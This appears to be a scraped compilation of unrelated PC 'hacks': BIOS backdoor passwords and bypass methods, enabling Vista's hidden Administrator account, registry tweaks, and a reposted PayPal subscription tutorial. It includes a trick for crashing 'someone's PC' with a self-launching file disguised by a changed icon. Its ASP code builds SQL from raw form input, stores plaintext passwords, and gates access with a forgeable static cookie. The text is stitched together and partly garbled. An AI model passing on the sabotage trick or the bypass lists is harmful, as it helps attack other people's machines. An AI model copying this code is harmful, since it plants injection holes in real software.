Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot


--------------------------------------------------------------------------------

Password cr@cking software

The following software can be used to either cr@ck or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The sorrys of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the sorry of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.

Unlock The Supersecret Administrator Account For Vista


Deep inside the bowels of Windows Vista, there’s a secret Administrator account, and it’s different from the normal administrator account you most likely have set up on your PC. This Administrator account is not part of the Administrator group. (Confused yet? You should be.) It’s a kind of superadministrator, akin to the root account in Unix, and by default it’s turned off and hidden. (In describing this tut, i’ll always use the capital “A” for the secret Administrator account, and a lowercase “a” for a normal administrator account.)

In versions of Windows before Windows Vista, the Administrator account wasn’t hidden, and many people used it as their main or only account. This Administrator account had full rights over the computer.

In Windows Vista, Microsoft changed that. In Vista, the Administrator account is not subject to UAC, but normal administrator accounts are. So the Administrator can make any changes to the system and will see no UAC prompts.

Turning on the Administrator account is straightforward. First, open command prompt by typing cmd into the run box on the Start menu, or by right-clicking the command prompt icon that appears at the top of the Start menu, then selecting Run as administrator.

Then enter this command and press Enter:

Net user administrator /active:yes

From now on, the Administrator account will appear as an option on the Welcome screen, along with any user accounts you may have set up. Use it like any other account. Be aware that it won’t have a password yet, so it’s a good idea to set a password for it.

If you want to disable the account and hide it, enter this command at an elevated command prompt and press Enter:

Net user administrator /active:no


ENJOY!!!!!!!!

ENABLE OR DISABLE USB PORT IN WINDOWS

Follow the steps to disable usb port in windowss
*Click Start, and then click Run.
*In the Open box, type regedit, and then click OK.
*Locate, and then click the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
*In the right pane, double-click Start.
*In the Value data box, type 4, click Hexadecimal (if it is not already selected), and then click OK.
*Quit Registry Editor.

To re-enable
*Click Start, and then click Run.
*In the Open box, type regedit, and then click OK.
*Locate, and then click the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
*In the right pane, double-click Start.
*In the Value data box, type 3, click Hexadecimal (if it is not already selected), and then click OK.
*Quit Registry Editor.

OR

start>>settings>>controlpannel>>system>>hardware>>devise manager>>look for the usb port in the list and select it then you can see an option disable or enable accordingly on the tool bar

Crash the Computer Easily

if u wnt to crash someones PC just try this
Open a notepad
Type the following
start rabi.dat
rabi.dat
save the file as rabi.dat
by using right click you can change icon
once the file is created if some one is going to click it
the system will crash

Enjoy..........

How to hide computer drives to secure data?

--------------------------------------------------------------------------------
This tip is very useful for home users, particularly for those who wants to hide/secure there important data from other users. You can hideany specific local drive or all drives (physical and removable) of the system and network drives also. By disabling the display of drives, youcan safe your personal data from non-technical users on a single computer.
Follow the given steps tochange the system drives registry value:
*.
To use this feature, you will need to be logged into your computer with
administrative rights.
*.
Click Start button and type regedit in Run option then press Enter for next.
*.
Here locate the sorryto:
· HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explo rer
· Here in right side panel, right click to create a new DWORD value
with name NoDrives (it iscase sensitive), then assign number
to its value data box.
· Now if you want to hide all system drives then modify value data
to 3FFFFFF .
· For specific drive use values (For example, for A, B, C, D, E, F, G,
H drives, the values are 1, 2, 4, 8, 16, 32, 64, and 128 respectively).
· In this case we are trying to hide F drive, so we modify the value data
box to 32.
· Now close the registry editor and restart your computer after any
changes to go into effect.
· But next time, if you want to unhide this drivethen simply change
the value data box or delete the DWORD item.
*.
Again close the registryeditor and restart your computer after any
changes to go into effect.

--------------------------------------------------------------------------------

Hack PayPal

Sell Subscriptions to Your Online Content Hack #61
Combine a database, PayPal subscriptions, and the IPN system to manage subscriber accounts.


If your web site offers something special that people are willing to pay for, such as access to a technical information database or specialized businessto- business commerce site, you might want to offer subscriptions. PayPal makes it easy. Using IPN, your web server, and your online database, you
can easily create an entirely automated system.


Many adult sites on the Internet are available on a subscription basis. Don’t offer subscriptions to these sorts of sites
with PayPal. Your site’s content must be allowed under Pay- Pal’s Acceptable Use Policy; otherwise, you might find that your account has been limited.


For the purposes of this example, let’s say you offer access to a Rhesus monkey marketing database for the low, low price of $30 per month. This opt-in database contains the monkey name, monkey age, aregiver name, and mailing address of over 10,000 monkeys across North America. You offer your subscribers, typically Rhesus monkey supply vendors, access to this information
for marketing purposes.


You’ll need four things to implement your subscription business model:


• A Subscribe button on your web site
• An online database that includes a subscribers table
• An IPN script to keep tabs on new, renewed, and expired subscriptions
• Dynamic pages that check a visitor’s status before allowing access


Creating a Subscribe Button


The Subscribe button for your site can come straight from PayPal’s button generator on the Merchant Tools page (log into PayPal and click the Merchant Tools tab). This example (created without encryption) should look familiar if you have created any unencrypted Buy Now or Donate Now buttons.


The variables a3, p3, and t3 set the amount, period, and time unit of the subscription, respectively:



Monkey Market Database
















Setting Up Your Database


Your access control database can be simple. A single table, shown in Table 6-1, containing the email address and the password of your subscriber is all you need. For this example, the table subscribers contains two alphanumeric fields: email and password. You could issue customer usernames to your subscribers, but you might be better served if you follow Pay- Pal’s example and use email addresses to identify users. Passwords can be stored as plain text.


Table 6-1. A database to keep track of your subscribers
ID email password
4005 shannon@paypalhacks.com sR3Du4#m77ca
4006 dave@paypalhacks.com go3@c23-dad43
4007 david@paypalhacks.com fae0v32c&ewf2




Processing Subscriber Notifications


You need to handle two kinds of notifications from PayPal: the addition of new subscribers to your database when they sign up and removal of subscribers whose subscriptions lapse or are cancelled. Here’s a snippet of ASP that does this (see the “Database Coding and Platform Choices” section of
the Preface for database considerations):





<% if Request.Form("txn_type") == "subscr_signup" then ' Add this subscriber to the database ' Use SQL like this: set cInsSubscr = Server.CreateObject("ADODB.Command") cInsSubscr.ActiveConnection = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ="C:/InetPub/wwwroot/database/dbPayPal.mdb") cInsSubscr.CommandText = "INSERT INTO subscriber (email, password) VALUES ( '" & Request.Form("payer_email") & "', 'drowssap')" cInsSubscr.CommandType = 1 cInsSubscr.CommandTimeout = 0 cInsSubscr.Prepared = true cInsSubscr.Execute( ) ' Email the password to the new subscriber elsif Request.form("txn_type") == "subscr_cancel" then ' Remove a subscriber from the database ' Use SQL like this: set cDelSubscr = Server.CreateObject("ADODB.Command") cDelSubscr.ActiveConnection = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ="C:/InetPub/wwwroot/database/dbPayPal.mdb") cDelSubscr.CommandText = "DELETE * FROM subscriber WHERE email = '" & Request.Form("payer_email") & "'" cDelSubscr.CommandType = 1 cDelSubscr.CommandTimeout = 0 cDelSubscr.Prepared = true cDelSubscr.Execute( ) end %>


Don’t really give every one of your subscribers the same password (drowssap in this example). Instead, use an algorithm for generating a password or let them choose a password for themselves in the subscription process. Don’t forget to turn on IPN in your PayPal account and point it at your IPN processing script .


Controlling Access to Your Valued Content
Now you have a list of valid subscribers that is automatically updated by PayPal and your IPN script. Next, you’ll need to make use of this information by ensuring that visitors to your site are on the current subscriber list.
In this example, all the members-only pages are dynamic ASP pages. The first thing the code does is check that the user is properly logged in. If not, the premium content is not displayed and the user is redirected to a Sign In page. You know the user is signed in if the magic cookie has been set.


<% 'content.asp 'Check for the magic cookie. 'If not found, redirect if Response.Cookies("MagicMonkey) != "swordfish" then Response.Print("Please log in before accessing this page.") Response.Redirect("login.asp") end %>



The Sign In page simply asks for the user’s email address and password. If this information shows the visitor is a valid subscriber, a cookie is set on the user’s browser. The cookie contains the magic word that allows your subscribers access. Without this cookie, set to the proper magic word, no one can access subscriber-only content.


<% 'Sign in page: sign_in.asp 'Database connection code goes here 'Connect to database and create recordset connStore = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ="C:/InetPub/wwwroot/database/dbPayPal.mdb") set rsCookies = Server.CreateObject("ADODB.Recordset") rsCookies.ActiveConnection = connStore rsCookies.Source = "SELECT * from subscribers WHERE email = '" & Request.Form("email") & "' AND password = '" & Request.Form("password") & "'" rsCookies.Open( ) 'IF the query turns up a match, execute this code: 'Set new cookie session in MagicMonkey ' "swordfish" happens to be today's magic cookie word Response.Cookies("MagicMonkey") = "swordfish" 'Set cookie expiration Response.Cookies("MagicMonkey").Expires = Now( ) + 1 'one day Response.Print("Thank you for logging in. Click
here
to start selling stuff to a bunch of monkey lovers.")
'ELSE do this:
Response.Redirect("login.asp")
%>


Your page, login.asp, should contain an HTML form that asks for each customer’s email address and password. Its data is posted to sign_in.asp.

How to Place Windows Kernel into RAM

It’s a given that anything that runs in RAM will be faster than an item that has to access the hard drive and virtual memory. Rather than have the kernel that is the foundation of XP using the slower Paging Executive functions,
use this hack to create and set the DisablePagingExecutive DWORD to a value of 1.

Perform this hack only if the system has 256MB or more of
installed RAM!

Edit the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\DisablePagingExecutive to 1 to disable paging and have the kernel run in RAM (set the value to 0 to undo this hack). Exit the Registry and reboot.

Enjoy!!!!!!!!!!!